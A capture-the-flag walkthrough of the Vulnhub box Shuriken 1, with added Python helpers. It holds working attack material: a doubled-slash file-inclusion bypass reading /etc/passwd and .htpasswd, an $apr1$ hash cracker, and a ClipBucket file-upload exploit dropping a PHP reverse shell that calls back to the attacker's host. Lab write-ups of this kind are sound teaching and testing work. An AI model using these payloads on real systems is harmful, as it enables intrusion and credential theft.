Shuriken 1
Identify the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.163.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:1b:5b:15 1 60 PCS Systemtechnik GmbH
192.168.56.238 08:00:27:08:ec:f1 1 60 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.238 (192.168.56.1 and 192.168.56.100 belong to the VirtualBox host-only network itself).
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.238 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-29 06:10 EST
Nmap scan report for bogon (192.168.56.238)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Shuriken
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp filtered http-proxy
MAC Address: 08:00:27:08:EC:F1 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.17 seconds
The NMAP scan shows one open port on the target, 80 (HTTP, Apache 2.4.29 on Ubuntu). Port 8080 is reported as filtered rather than closed: the other 65533 ports answered with RST, so something is dropping packets to 8080.
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ nikto -h http://192.168.56.238
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.238
+ Target Hostname: 192.168.56.238
+ Target Port: 80
+ Start Time: 2022-11-29 06:16:18 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /secret/: Directory indexing found.
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 7916 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2022-11-29 06:17:09 (GMT-5) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto found /secret/ (directory indexing enabled) and /login.html.
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ curl http://192.168.56.238/secret/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /secret</title>
</head>
<body>
<h1>Index of /secret</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="secret.png">secret.png</a></td><td align="right">2020-10-04 16:55 </td><td align="right">202K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.238 Port 80</address>
</body></html>
Download the image to the Kali Linux machine:
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ wget http://192.168.56.238/secret/secret.png
--2022-11-29 06:19:14-- http://192.168.56.238/secret/secret.png
Connecting to 192.168.56.238:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207283 (202K) [image/png]
Saving to: ‘secret.png’
secret.png 100%[====================================================>] 202.42K --.-KB/s in 0.002s
2022-11-29 06:19:14 (79.3 MB/s) - ‘secret.png’ saved [207283/207283]
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ ls
nmap_full_scan secret.png
Scan for other directories or files:
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ gobuster dir -u http://192.168.56.238 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.238
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/29 06:20:58 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 314] [--> http://192.168.56.238/img/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.238/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.238/js/]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.238/secret/]
/server-status (Status: 403) [Size: 279]
Progress: 217532 / 220561 (98.63%)
===============================================================
2022/11/29 06:21:28 Finished
The directory scan turned up nothing more valuable. The text in /secret/secret.png reads "javascript", so the author is hinting that the way in is through the site's JavaScript. Looking closely at the homepage index.php, two scripts are included:
<script src="/js/index__7ed54732.js"></script>
<script src="/js/index__d8338055.js"></script>
The first one is minified, so paste it into an online JS beautifier to make it readable:
https://www.qianbo.com.cn/Tool/Beautify/Js-Formatter.html
After formatting, the JS code is:
! function(a, e) {
for (var t in e) a[t] = e[t]
}(window, function(a) {
var e = {};
function t(n) {
if (e[n]) return e[n].exports;
var s = e[n] = {
i: n,
l: !1,
exports: {}
};
return a[n].call(s.exports, s, s.exports, t), s.l = !0, s.exports
}
return t.m = a, t.c = e, t.d = function(a, e, n) {
t.o(a, e) || Object.defineProperty(a, e, {
enumerable: !0,
get: n
})
}, t.r = function(a) {
"undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(a, Symbol.toStringTag, {
value: "Module"
}), Object.defineProperty(a, "__esModule", {
value: !0
})
}, t.t = function(a, e) {
if (1 & e && (a = t(a)), 8 & e) return a;
if (4 & e && "object" == typeof a && a && a.__esModule) return a;
var n = Object.create(null);
if (t.r(n), Object.defineProperty(n, "default", {
enumerable: !0,
value: a
}), 2 & e && "string" != typeof a)
for (var s in a) t.d(n, s, function(e) {
return a[e]
}.bind(null, s));
return n
}, t.n = function(a) {
var e = a && a.__esModule ? function() {
return a.default
} : function() {
return a
};
return t.d(e, "a", e), e
}, t.o = function(a, e) {
return Object.prototype.hasOwnProperty.call(a, e)
}, t.p = "http://broadcast.shuriken.local", t(t.s = 0)
}({
0: function(a, e, t) {
a.exports = t("WdQY")
},
WdQY: function(a, e, t) {
"use strict";
function n(a, e, t) {
return e in a ? Object.defineProperty(a, e, {
value: t,
enumerable: !0,
configurable: !0,
writable: !0
}) : a[e] = t, a
}
t.r(e);
var s = t("kiQV");
function l(a) {
var e = a.host,
t = a.chatAlias,
n = a.callbackAlias,
s = a.lang;
return fetch(function(a) {
var e = a.host,
t = a.chatAlias,
n = void 0 === t ? "" : t,
s = a.callbackAlias,
l = void 0 === s ? "" : s,
i = a.lang,
c = void 0 === i ? "pl-PL" : i;
return "".concat(void 0 === e ? "http://broadcast.shuriken.local" : e)
.concat("/", "?_alias=")
.concat(n, "&_callbackAlias=")
.concat(l, "&_lang=")
.concat(c)
}({
host: e,
chatAlias: t,
callbackAlias: n,
lang: s
}))
.then((function(a) {
return a.json()
}))
.then((function(a) {
return {
chatAgentsAvailable: a.agents > 0,
callbackAsapAgentsAvailable: a.callbackAsapAgentsAvailable > 0,
callbackScheduleAgentsAvailable: a.callbackScheduleAgentsAvailable > 0
}
}))
}
t.d(e, "INTERVAL_TIME", (function() {
return i
})), t.d(e, "default", (function() {
return r
}));
var i = 5e3,
c = function() {},
r = function a() {
var e = this;
! function(a, e) {
if (!(a instanceof e)) throw new TypeError("Cannot call a class as a function")
}(this, a), n(this, "clearInterval", (function() {
e.agentsAvailabilityCheckInterval && (clearInterval(e.agentsAvailabilityCheckInterval), e.agentsAvailabilityCheckInterval = null)
})), n(this, "checkAgentsAvailability", (function() {
l({
host: e.host,
chatAlias: e.chatAlias,
callbackAlias: e.callbackAlias,
lang: e.lang
})
.then(e.updateAgentsStatus)
})), n(this, "startAgentsAvailabilityChecker", (function(a) {
var t = a.host,
n = a.chatAlias,
s = a.callbackAlias,
c = a.lang,
r = void 0 === c ? "pl-PL" : c;
e.callbackAlias = s, e.chatAlias = n, e.host = t, e.lang = r, e.clearInterval(), l({
host: t,
chatAlias: n,
callbackAlias: s,
lang: r
})
.then(e.updateAgentsStatus), e.agentsAvailabilityCheckInterval = setInterval(e.checkAgentsAvailability, i)
})), n(this, "registerFunctions", (function(a) {
var t = a.startGenesysSession,
n = void 0 === t ? e.startGenesysSession : t,
s = a.endGenesysSession,
l = void 0 === s ? e.endGenesysSession : s;
e.startGenesysSession = n, e.endGenesysSession = l
})), n(this, "startChatSession", (function() {
e.startGenesysSession(), e.chatInProgress = !0
})), n(this, "updateMedaliaScenario", (function(a) {
e.medaliaScenario = a
})), n(this, "updateAgentsStatus", (function(a) {
var t = a.chatAgentsAvailable,
n = a.callbackAsapAgentsAvailable,
s = a.callbackScheduleAgentsAvailable;
e.chatAgentsAvailable = t, e.callbackAsapAgentsAvailable = n, e.callbackScheduleAgentsAvailable = s
})), n(this, "quitChatSession", (function() {
e.endGenesysSession(), e.chatInProgress = !1
})), this.agentsAvailabilityCheckInterval = null, this.callbackAlias = "", this.callbackAsapAgentsAvailable = !1, this.callbackScheduleAgentsAvailable = !1, this.chatAgentsAvailable = !1, this.chatAlias = "", this.chatInProgress = !1, this.endGenesysSession = c, this.host = "", this.lang = "pl-PL", this.medaliaScenario = "", this.startGenesysSession = c
};
window.opbox.services.register({
serviceName: s.a
}, r)
},
kiQV: function(a) {
a.exports = JSON.parse('{"a":"opbox-customer-chat-service"}')
}
}));
//# sourceMappingURL=index_7ed54732.js.map
The bundle's public path (t.p) reveals a hostname: broadcast.shuriken.local
Add it to /etc/hosts:
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.238 broadcast.shuriken.local
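Reading two minified bundles by hand is fine for this box but does not scale. The following is an added example (my code, not from the post or from the target site) that automates the step: it reads the script tags out of the page, scans each bundle for http(s) literals, and reports the hostnames and query-parameter names they contain, ready to be turned into /etc/hosts lines. The HTML and JS bodies are constructed stand-ins shaped like the literals in the two bundles (the t.p public path above, and a referer URL like the one the second bundle holds); sample_fetch and all function names are mine, and on a live target sample_fetch would be replaced by an HTTP GET.

```python
"""Pull hostnames and query parameters out of a page's script bundles.

Added example for this walkthrough, not code from the post or from the target
site. The HTML and JS below are constructed stand-ins shaped like what
index.php and /js/*.js served; sample_fetch is the hypothetical stand-in for
fetching each script over HTTP.
"""
import re
from urllib.parse import urljoin, urlsplit, parse_qsl

BASE = "http://192.168.56.238/"

# Constructed sample page: the two script tags seen on the homepage.
SAMPLE_HTML = """
<html><head><title>Shuriken</title>
<script src="/js/index__7ed54732.js"></script>
<script src="/js/index__d8338055.js"></script>
</head><body></body></html>
"""

# Constructed bundle fragments: the t.p public path from the first bundle and a
# referer URL literal like the one in the second.
SAMPLE_JS = {
    "/js/index__7ed54732.js": 't.p="http://broadcast.shuriken.local",t(t.s=0)',
    "/js/index__d8338055.js": 'var u="http://shuriken.local/index.php?referer=";fetch(u+document.referrer)',
}

SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']([^"\']+)["\']', re.I)
URL_LITERAL = re.compile(r'https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s"\'<>)]*)?')


def sample_fetch(url: str) -> str:
    """Offline stand-in for an HTTP GET of a script URL."""
    return SAMPLE_JS[urlsplit(url).path]


def script_sources(html: str, base: str) -> list:
    """Absolute URLs of every external script the page references."""
    return [urljoin(base, src) for src in SCRIPT_SRC.findall(html)]


def urls_in_js(js: str) -> list:
    """Every http(s) literal in a JS body, in order of appearance, deduplicated."""
    seen, out = set(), []
    for url in URL_LITERAL.findall(js):
        if url not in seen:
            seen.add(url)
            out.append(url)
    return out


def recon(html: str, base: str, fetch) -> dict:
    """Map each hostname found in the bundles to its URLs and query parameter names."""
    hosts = {}
    for src in script_sources(html, base):
        for url in urls_in_js(fetch(src)):
            parts = urlsplit(url)
            entry = hosts.setdefault(parts.hostname, {"urls": [], "params": []})
            entry["urls"].append(url)
            for name, _ in parse_qsl(parts.query, keep_blank_values=True):
                if name not in entry["params"]:
                    entry["params"].append(name)
    return hosts


def hosts_lines(hosts: dict, ip: str) -> list:
    """/etc/hosts lines for every discovered hostname, pointing at the target."""
    return [f"{ip} {host}" for host in sorted(hosts)]


if __name__ == "__main__":
    found = recon(SAMPLE_HTML, BASE, sample_fetch)
    for host, info in found.items():
        print(f"{host}: urls={info['urls']} params={info['params']}")
    print("\n".join(hosts_lines(found, "192.168.56.238")))
```

The parameter names are the part worth keeping: a vhost found this way is only useful once it resolves, and a parameter such as referer that the front-end hands a URL to is the first thing to probe for traversal or inclusion.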
Visiting http://broadcast.shuriken.local pops up a credential prompt: the vhost is protected by HTTP Basic authentication.
Looking at the other JS file turns up another URL:
http://shuriken.local/index.php?referer=
(shuriken.local has to resolve too, so add it to /etc/hosts next to broadcast.shuriken.local.) Requesting this URL, the referer parameter looks like it is fed to a file include, but unlike the usual local file inclusion a plain ../ sequence does not work; each step needs a doubled slash. That is consistent with a filter that strips the literal string ../ once: ..// is left as / after the strip, and the resulting ////etc/passwd still resolves to /etc/passwd.
view-source:http://shuriken.local/index.php?referer=..//..//..//..//etc/passwd
This returns the contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
lightdm:x:106:113:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:107:117::/nonexistent:/bin/false
kernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
pulse:x:109:119:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:110:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
server-management:x:1000:1000:server-management,,,:/home/server-management:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
mysql:x:112:123:MySQL Server,,,:/nonexistent:/bin/false
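Why the doubled slash works, as an added example (my code, not the box's index.php and not from the post): naive_filter and looping_filter are hypothetical emulations of a blacklist that removes the literal ../; the behaviour observed above is consistent with the first, but the target's real filter is not visible from the outside. include_target models what the OS opens afterwards, and hardened_target is the fix a practitioner should ship instead: canonicalise, then check the result is still inside the allowed directory. WEBROOT and INCLUDE_DIR are assumed values.

```python
"""Why ..// gets through where ../ does not.

Added example for this walkthrough. naive_filter and looping_filter are
hypothetical emulations of a blacklist that strips the literal "../"; the
target's observed behaviour is consistent with the first, but this is not the
box's actual index.php. WEBROOT and INCLUDE_DIR are assumed values.
"""
import posixpath

WEBROOT = "/var/www/html"            # assumed document root
INCLUDE_DIR = WEBROOT + "/includes"  # assumed directory the referer should select from


def naive_filter(referer: str) -> str:
    """Emulates str_replace('../', '', $referer): one non-overlapping pass."""
    return referer.replace("../", "")


def looping_filter(referer: str) -> str:
    """The first 'fix' people reach for: keep stripping until no '../' is left."""
    while "../" in referer:
        referer = referer.replace("../", "")
    return referer


def include_target(filtered: str) -> str:
    """What the OS ends up opening: an absolute path as-is, a relative one under WEBROOT."""
    path = filtered if filtered.startswith("/") else posixpath.join(WEBROOT, filtered)
    return posixpath.normpath(path)


def hardened_target(referer: str, base: str = INCLUDE_DIR):
    """Canonicalise first, then require the result to stay inside base.

    No blacklist: returns None for anything that escapes, whatever trick
    produced it. With real files use os.path.realpath so symlinks resolve too.
    """
    candidate = posixpath.normpath(posixpath.join(base, referer))
    if posixpath.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for payload in ("../../../../etc/passwd", "..//..//..//..//etc/passwd"):
        print(f"{payload:32} naive -> {include_target(naive_filter(payload))}")
        print(f"{'':32} loop  -> {include_target(looping_filter(payload))}")
        print(f"{'':32} hard  -> {hardened_target(payload)}")
```

The looping variant is included to show that stripping repeatedly does not help here: the first pass already leaves ////etc/passwd, which contains no ../ to strip and is an absolute path. In this emulation a bare /etc/passwd would also slip past both filters, so when testing a suspected include parameter try the absolute path as well as the ..// form.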
The HTTP Basic auth credentials live in .htpasswd, so keep using the local file inclusion:
http://shuriken.local/index.php?referer=..//..//..//..//..//..//etc//apache2//.htpasswd
The source of the returned page contains the .htpasswd entry:
developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0
Crack it with john:
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ echo 'developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0' > hashes
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
9972761drmfsls (developers)
1g 0:00:00:09 DONE (2022-11-29 06:54) 0.1013g/s 218961p/s 218961c/s 218961C/s 9982..99686420
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
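The hash fell in nine seconds because $apr1$ is Apache's MD5-based htpasswd scheme: md5crypt with a different magic string, a fixed 1000 rounds and no memory cost, which is why john reports ~219k candidates per second on two threads. The following is an added example (my code, not from the post, john or Apache) that implements the scheme from scratch so the cracked password can be checked offline without john, and runs a constructed mini wordlist against the .htpasswd line read above.

```python
"""Offline check of an Apache .htpasswd $apr1$ hash.

Added example for this walkthrough, not code from the post or from any tool it
uses. apr1_crypt is a from-scratch implementation of Apache's MD5-based
htpasswd scheme (md5crypt with the "$apr1$" magic), written so the cracked
password can be verified without john; the candidate list is constructed.
"""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HTPASSWD_LINE = "developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0"  # from the LFI read above


def _to64(value: int, length: int) -> str:
    """md5crypt's custom base64: 6 bits at a time, least significant first."""
    out = []
    for _ in range(length):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_crypt(password: str, salt: str) -> str:
    """Apache $apr1$ hash of password under salt (salt is at most 8 chars)."""
    magic = b"$apr1$"
    pw = password.encode()
    salt_b = salt.encode()[:8]

    ctx = hashlib.md5(pw + magic + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    remaining = len(pw)
    while remaining > 0:                      # mix in alt, len(pw) bytes' worth
        ctx.update(alt[: min(16, remaining)])
        remaining -= 16
    bits = len(pw)
    while bits:                               # one byte per bit of len(pw)
        ctx.update(b"\x00" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()

    for i in range(1000):                     # fixed 1000-round stretching
        ctx = hashlib.md5()
        ctx.update(pw if i & 1 else final)
        if i % 3:
            ctx.update(salt_b)
        if i % 7:
            ctx.update(pw)
        ctx.update(final if i & 1 else pw)
        final = ctx.digest()

    encoded = (
        _to64((final[0] << 16) | (final[6] << 8) | final[12], 4)
        + _to64((final[1] << 16) | (final[7] << 8) | final[13], 4)
        + _to64((final[2] << 16) | (final[8] << 8) | final[14], 4)
        + _to64((final[3] << 16) | (final[9] << 8) | final[15], 4)
        + _to64((final[4] << 16) | (final[10] << 8) | final[5], 4)
        + _to64(final[11], 2)
    )
    return f"$apr1${salt_b.decode()}${encoded}"


def parse_htpasswd_line(line: str):
    """Split 'user:$apr1$salt$digest' into (user, salt, full hash)."""
    user, hashed = line.strip().split(":", 1)
    _, magic, salt, _digest = hashed.split("$")
    if magic != "apr1":
        raise ValueError(f"not an $apr1$ hash: {hashed}")
    return user, salt, hashed


def crack(line: str, candidates):
    """Return the first candidate whose $apr1$ hash matches the line, else None."""
    _user, salt, hashed = parse_htpasswd_line(line)
    for candidate in candidates:
        if apr1_crypt(candidate, salt) == hashed:
            return candidate
    return None


if __name__ == "__main__":
    # Constructed mini wordlist standing in for rockyou.txt.
    wordlist = ["password", "123456", "shuriken", "9972761drmfsls"]
    print(crack(HTPASSWD_LINE, wordlist))
```

The defensive takeaway is the same one john's speed makes: a password file that is readable through an include bug should at least be slow to crack, and on Apache 2.4 that means creating it with htpasswd -B (bcrypt) rather than the default MD5 scheme.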
Log in through the Basic auth prompt with developers:9972761drmfsls. Once in, the application identifies itself as ClipBucket.
Look up known exploits for it:
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ searchsploit clipbucket
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
ClipBucket - 'beats_uploader' Arbitrary File Upload (Metasploit) | php/webapps/44346.rb
Clipbucket 1.7 - 'dwnld.php' Directory Traversal | php/webapps/32802.txt
Clipbucket 1.7.1 - Multiple SQL Injections | php/webapps/34694.txt
Clipbucket 2.4 RC2 645 - SQL Injection | php/webapps/17325.py
Clipbucket 2.5 - Blind SQL Injection | php/webapps/20708.txt
Clipbucket 2.5 - Cross-Site Request Forgery | php/webapps/20666.html
Clipbucket 2.5 - Directory Traversal | php/webapps/20704.txt
Clipbucket 2.6 - 'channels.php?cat' Cross-Site Scripting | php/webapps/36524.txt
Clipbucket 2.6 - 'channels.php?time' SQL Injection | php/webapps/36532.txt
Clipbucket 2.6 - 'collections.php?cat' Cross-Site Scripting | php/webapps/36525.txt
Clipbucket 2.6 - 'groups.php?cat' Cross-Site Scripting | php/webapps/36526.txt
Clipbucket 2.6 - 'search_result.php?query' Cross-Site Scripting | php/webapps/36527.txt
Clipbucket 2.6 - 'videos.php?cat' Cross-Site Scripting | php/webapps/36528.txt
Clipbucket 2.6 - 'videos.php?time' SQL Injection | php/webapps/36531.txt
Clipbucket 2.6 - 'view_collection.php?type' Cross-Site Scripting | php/webapps/36529.txt
Clipbucket 2.6 - 'view_item.php?type' Cross-Site Scripting | php/webapps/36530.txt
Clipbucket 2.6 - Multiple Vulnerabilities | php/webapps/18341.txt
Clipbucket 2.6 Revision 738 - Multiple SQL Injections | php/webapps/23252.txt
Clipbucket 2.7 RC3 0.9 - Blind SQL Injection | php/webapps/36156.txt
ClipBucket 2.8 - 'id' SQL Injection | php/webapps/45688.txt
ClipBucket 2.8.3 - Multiple Vulnerabilities | php/webapps/42457.txt
ClipBucket 2.8.3 - Remote Code Execution | php/webapps/42954.py
ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection | php/webapps/44250.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ searchsploit -m php/webapps/44250.txt
Exploit: ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection
URL: https://www.exploit-db.com/exploits/44250
Path: /usr/share/exploitdb/exploits/php/webapps/44250.txt
File Type: ASCII text
Copied to: /home/kali/Vulnhub/Shuriken_1/44250.txt
Use the arbitrary file upload from 44250 (the beats_uploader.php action needs no ClipBucket login; the -u below only satisfies the vhost's Basic auth) to put a PHP reverse shell on the target. rshell.php is a PHP reverse shell pointing back at the Kali box, 192.168.56.206 port 5555:
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ curl -F "file=@rshell.php" -F "plupload=1" -F "name=rshell.php" \
"http://broadcast.shuriken.local/actions/beats_uploader.php" -u developers:9972761drmfsls
creating file{"success":"yes","file_name":"1669723866241fca","extension":"php","file_directory":"CB_BEATS_UPLOAD_DIR"}
The response gives the stored name (file_name, with the returned extension, so 1669723866241fca.php) and the upload directory, which is listable at:
http://broadcast.shuriken.local/actions/CB_BEATS_UPLOAD_DIR/
Start a listener, then request the uploaded file from that directory to trigger the shell:
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.238] 55712
Linux shuriken 5.4.0-47-generic #51~18.04.1-Ubuntu SMP Sat Sep 5 14:35:50 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:14:22 up 1:08, 0 users, load average: 0.00, 0.00, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$